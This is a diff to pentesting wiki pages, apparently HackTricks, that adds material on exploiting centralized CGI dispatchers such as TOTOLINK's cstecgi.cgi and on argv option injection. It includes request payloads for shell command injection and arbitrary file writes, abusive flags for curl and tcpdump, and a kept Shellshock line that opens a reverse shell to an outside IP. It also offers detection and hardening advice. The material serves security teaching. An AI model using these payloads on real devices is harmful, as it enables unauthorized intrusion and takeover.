TOTOLINK X6000R Three New Vulnerabilities Uncovered

src/network-services-pentesting/pentesting-web/cgi.md

@@ -59,11 +59,37 @@ curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' htt
 > run
 ```
 
-## **Proxy \(MitM to Web server requests\)**
+## Centralized CGI dispatchers (single endpoint routing via selector parameters)
 
-CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com"
+Many embedded web UIs multiplex dozens of privileged actions behind a single CGI endpoint (for example, `/cgi-bin/cstecgi.cgi`) and use a selector parameter such as `topicurl=<handler>` to route the request to an internal function.
 
-As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**" and if the server performs any request during the session. You will be able to capture each request made by the server.
+Methodology to exploit these routers:
+
+- Enumerate handler names: scrape JS/HTML, brute-force with wordlists, or unpack firmware and grep for handler strings used by the dispatcher.
+- Test unauthenticated reachability: some handlers forget auth checks and are directly callable.
+- Focus on handlers that invoke system utilities or touch files; weak validators often only block a few characters and might miss the leading hyphen `-`.
+
+Generic exploit shapes:
+
+```http
+POST /cgi-bin/cstecgi.cgi HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+
+# 1) Option/flag injection (no shell metacharacters): flip argv of downstream tools
+topicurl=<handler>&param=-n
+
+# 2) Parameter-to-shell injection (classic RCE) when a handler concatenates into a shell
+topicurl=setEasyMeshAgentCfg&agentName=;id;
+
+# 3) Validator bypass → arbitrary file write in file-touching handlers
+topicurl=setWizardCfg&<crafted_fields>=/etc/init.d/S99rc
+```
+
+Detection and hardening:
+
+- Watch for unauthenticated requests to centralized CGI endpoints with `topicurl` set to sensitive handlers.
+- Flag parameters that begin with `-` (argv option injection attempts).
+- Vendors: enforce authentication on all state-changing handlers, validate using strict allowlists/types/lengths, and never pass user-controlled strings as command-line flags.
 
 ## Old PHP + CGI = RCE \(CVE-2012-1823, CVE-2012-2311\)
 
@@ -80,8 +106,14 @@ curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:500
 
 **More info about the vuln and possible exploits:** [**https://www.zero-day.cz/database/337/**](https://www.zero-day.cz/database/337/)**,** [**cve-2012-1823**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1823)**,** [**cve-2012-2311**](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2311)**,** [**CTF Writeup Example**](https://github.com/W3rni0/HacktivityCon_CTF_2020#gi-joe)**.**
 
+## **Proxy \(MitM to Web server requests\)**
 
-{{#include ../../banners/hacktricks-training.md}}
+CGI creates a environment variable for each header in the http request. For example: "host:web.com" is created as "HTTP_HOST"="web.com"
+
+As the HTTP_PROXY variable could be used by the web server. Try to send a **header** containing: "**Proxy: &lt;IP_attacker&gt;:&lt;PORT&gt;**" and if the server performs any request during the session. You will be able to capture each request made by the server.
 
+## **References**
 
+- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
 
+{{#include ../../banners/hacktricks-training.md}}

src/pentesting-web/command-injection.md

@@ -158,6 +158,37 @@ execFile('/usr/bin/do-something', [
 
 Real-world case: *Synology Photos* ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into `id_user` which was later embedded in an `exec()` call, achieving RCE (Pwn2Own Ireland 2024).
 
+### Argument/Option injection via leading hyphen (argv, no shell metacharacters)
+
+Not all injections require shell metacharacters. If the application passes untrusted strings as arguments to a system utility (even with `execve`/`execFile` and no shell), many programs will still parse any argument that begins with `-` or `--` as an option. This lets an attacker flip modes, change output paths, or trigger dangerous behaviors without ever breaking into a shell.
+
+Typical places where this appears:
+
+- Embedded web UIs/CGI handlers that build commands like `ping <user>`, `tcpdump -i <iface> -w <file>`, `curl <url>`, etc.
+- Centralized CGI routers (e.g., `/cgi-bin/<something>.cgi` with a selector parameter like `topicurl=<handler>`) where multiple handlers reuse the same weak validator.
+
+What to try:
+
+- Provide values that start with `-`/`--` to be consumed as flags by the downstream tool.
+- Abuse flags that change behavior or write files, for example:
+  - `ping`: `-f`/`-c 100000` to stress the device (DoS)
+  - `curl`: `-o /tmp/x` to write arbitrary paths, `-K <url>` to load attacker-controlled config
+  - `tcpdump`: `-G 1 -W 1 -z /path/script.sh` to achieve post-rotate execution in unsafe wrappers
+- If the program supports `--` end-of-options, try to bypass naive mitigations that prepend `--` in the wrong place.
+
+Generic PoC shapes against centralized CGI dispatchers:
+
+```
+POST /cgi-bin/cstecgi.cgi HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+
+# Flip options in a downstream tool via argv injection
+topicurl=<handler>&param=-n
+
+# Unauthenticated RCE when a handler concatenates into a shell
+topicurl=setEasyMeshAgentCfg&agentName=;id;
+```
+
 ## Brute-Force Detection List
 
 
@@ -173,5 +204,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
 - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html)
 - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php)
 - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
+- [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/)
 
 {{#include ../banners/hacktricks-training.md}}